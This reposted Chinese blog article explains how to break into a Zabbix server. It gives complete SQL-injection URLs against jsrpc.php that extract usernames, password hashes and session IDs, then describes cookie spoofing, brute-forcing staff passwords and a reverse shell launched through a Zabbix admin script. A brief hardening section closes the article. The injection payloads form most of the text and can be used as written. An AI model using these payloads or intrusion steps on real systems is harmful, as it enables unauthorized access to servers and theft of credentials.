2. 程式人生 > 實用技巧 >zabbix服務漏洞利用入侵伺服器

zabbix服務漏洞利用入侵伺服器

阿新 發佈:2020-06-28

zabbix服務開放埠為10051,瀏覽器訪問http://IP/zabbix進行配置即可訪問zabbix的前臺頁面。

漏洞利用:

1、sql注入漏洞探測:

在攻擊機訪問的zabbix的地址後面加上如下url:

/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim
estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi
story.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfil
e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=
17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&
mark_color=1

輸出結果,若包含:You have an error in your SQL syntax;表示漏洞存在。

如果不行可以利用jsrpc的profileIdx2引數sql注入,具體操作如下:

jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,name,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype

獲取密碼:

jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17

 

獲取sessionid:

http://192.168.10.131/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=profileldx2=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,sessionid,0x7e)%20as%20char),0x7e))%20from%20zabbix.sessions%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17

使用者名稱密碼及sessionid值都已得到,可以先對密碼md5解密,解密成功可直接進入後臺。解密不成功可以用sessionid值進行Cookie欺騙替換zbx_sessionid即可成功以administrator登陸。這裡利用Cookie欺騙進行測試,經過御劍掃描發現setup.php頁面,但是沒有許可權登陸。

我們把這個頁面的zbx_sessionid替換成注入出來的sessionid值,重新整理後即可看到安裝頁面。

此時再次訪問http://192.168.10.131/zabbix/,即可成功進入後臺。

以上這一波操作都是借鑑某個大佬的,我自己其實沒有復現,因為沒有發現sql注入的漏洞;再此記錄一下,以防後面有跡可循。

接下來是我自己的一波操作:

2、弱口令爆破:

zabbix 預設賬戶Admin密碼zabbix,嘗試爆破了一輪沒有成功,還有一個預設賬戶:guest,這個賬號是沒有密碼的,於是登入進去,這個賬號許可權較小,不能建立scrpt。

於是用內部員工的姓名賬號進行一波弱口令爆破,很幸運的爆出來了一個弱口令賬戶還是管理員的許可權;

接下來就利用此賬號登入zabbix,進行反彈shell操作了:

(1)點選: 管理>指令碼>建立指令碼

(2)新增反彈shell的指令碼:

(3)執行指令碼進行反彈shell:

在執行shell之前,先在本機上監聽8887埠,執行shell成功之後會有shell反彈回來:

至此,已經成功入侵到伺服器了。

zabbix安全加固

下面說一下如何對zabbix安全加固,防止這種情況發生:

1、很重要的一點,zabbix的登入口令一定要複雜,不要用預設口令或弱口令,禁用guest登入功能;

2、zabbix的server和agent都不要以root啟動,不要設定AllowRoot=1;

3、禁止agent執行system.run,不要設定EnableRemoteCommands=1。

相關推薦

zabbix服務漏洞利用入侵伺服器

zabbix服務開放埠為10051,瀏覽器訪問http://IP/zabbix進行配置即可訪問zabbix的前臺頁面。

Zabbix漏洞利用 CVE-2016-10134

最近也是遇見了Zabbix,所以這裡以CVE-2016-10134為例復現一下該漏洞 什麼是Zabbix?

SSRF漏洞利用之Redis大神賜予shell

0x00實驗環境 1、centos靶機(IP為:192.168.11.205,橋接模式) 2、kali黑客攻擊主機(IP為:192.168.172.129,NAT模式)

01-zabbix服務說明

1. zabbix簡介 zabbix是一個基於WEB介面的提供分散式系統監視以及網路監視功能的企業級的開源解決方案

命令執行漏洞利用及繞過方式總結

命令注入常見的方法 1.常見管道符   Windows系統支援的管道符   Linux系統支援的管道符

zabbix服務監控

一、zabbix自定義監控模板 # 強制重新整理自定義監控項 [root@zabbix plugins]# zabbix_server -R config_cache_reload

phpStudy後門漏洞利用復現

一、漏洞描述 Phpstudy軟體是國內的一款免費的PHP除錯環境的程式整合包,通過整合Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer

php偽隨機數漏洞利用

php偽隨機數 相關函式 mt_rand() mt_rand函式有兩個可選引數 min 和 max,如果沒有提供可選引數,mt_rand函式將返回返回 0 到 mt_getrandmax() 之間的偽隨機數。例如想要 5 到 15(包括 5 和 15)之間的隨機

白帽子黑客與網路安全工程師帶你:遠端桌面漏洞利用與Windows7計算機攻防實戰

一、課前宣告: 1、本分享僅做學習交流,請自覺遵守法律法規! 2、搜尋:Kali 與程式設計,學習更多網路攻防乾貨! 3、Kali 與程式設計每天準時更新,敬請學習和關注! 二、戰略安排 2.1 開啟Metasploit滲透

安卓匯出元件activity拒絕服務漏洞(Drozer除錯)

App在AndroidManifest.xml檔案中設定了Activity為匯出,導致該元件可以被第三方程式呼叫,並可以通過Intent接受引數傳入。如果這些元件在從Intent獲取引數的時候沒有對其合法性進行校驗,且程式碼沒有使用異

Apache Shiro系列漏洞利用以及實戰總結

前言: Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。使用Shiro的易於理解的API,可以快速、輕鬆地獲得任何應用程式,從最小的移動應用程式到最大的網路和企業應用程式。

Dedecms5.7漏洞利用

Dedecms5.7滲透測試 Dedecms5.7由於程式設計的問題,有一個可以直接篡改使用者密碼的漏洞,一下是復現過程: 一:啟動環境: 首先要進行dedecms的安裝,其下載地址為:] DeDeCMS 官網 http://www.dedecms.c

zabbix自定義指令碼監控伺服器埠狀態

zabbix可以通過客戶端的[net.tcp.port[<ip>,port]]該item監控項來判斷本地/遠端伺服器TCP埠是否正常,不過當時沒有想起來,就用了自定義指令碼去寫的,很久沒有寫完全忘了,以下是步驟:

2020 weblogin rce CVE-2020-14882 漏洞利用POC

漏洞來源 根據P牛圈子告知,應該是長亭某研究員上報“voidfyoo”。 細節由國外人員披露

SSRF漏洞(原理、挖掘點、漏洞利用、修復建議)

1.介紹SSRF漏洞 SSRF (Server-Side Request Forgery,伺服器端請求偽造)是一種由攻擊者構造請求,由服務端發起請求的安全漏洞。一般情況下,SSRF攻擊的目標是外網無法訪問的內部系統(正因為請求是由服務端發起的,所以

Zabbix服務主機可用性ZBX紅色不可用

配置了zabbix主機的監控服務過後,發現有部分主機的可用性ZBX那裡是紅色,滑鼠移上去提示:Received empty response from Zabbix Agent at [x.x.x.x]. Assuming that agent dropped connection because of access pe

Web安全-Joomla核心SQL注入漏洞利用

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

linux雲服務搭建七日殺伺服器

目錄準備工作1.設定swap2.安裝screen3.安裝SteamCmd執行所需環境4.建立一個使用者steamCMD與七日殺伺服器端1.下載並安裝SteamCMD2.登入steam賬號3.下載七日殺服務端4.配置服務端5.配置防火牆6.啟動伺服器補充1.幾個重

【從入門到放棄系列學習筆記8】web應用安全基礎整理-SQL注入漏洞利用

一、SQL簡介   結構化查詢語言(structured Query language),是一種特殊的程式語言,用於資料庫中的標準資料查詢。

redis未授權訪問漏洞利用總結——linux篇

1、前言:   redis未授權漏洞或弱口令一直是很有用的滲透突破口,最近遇到了redis相關的目標,因此做一個簡單的收集,也方便自己日後的回顧。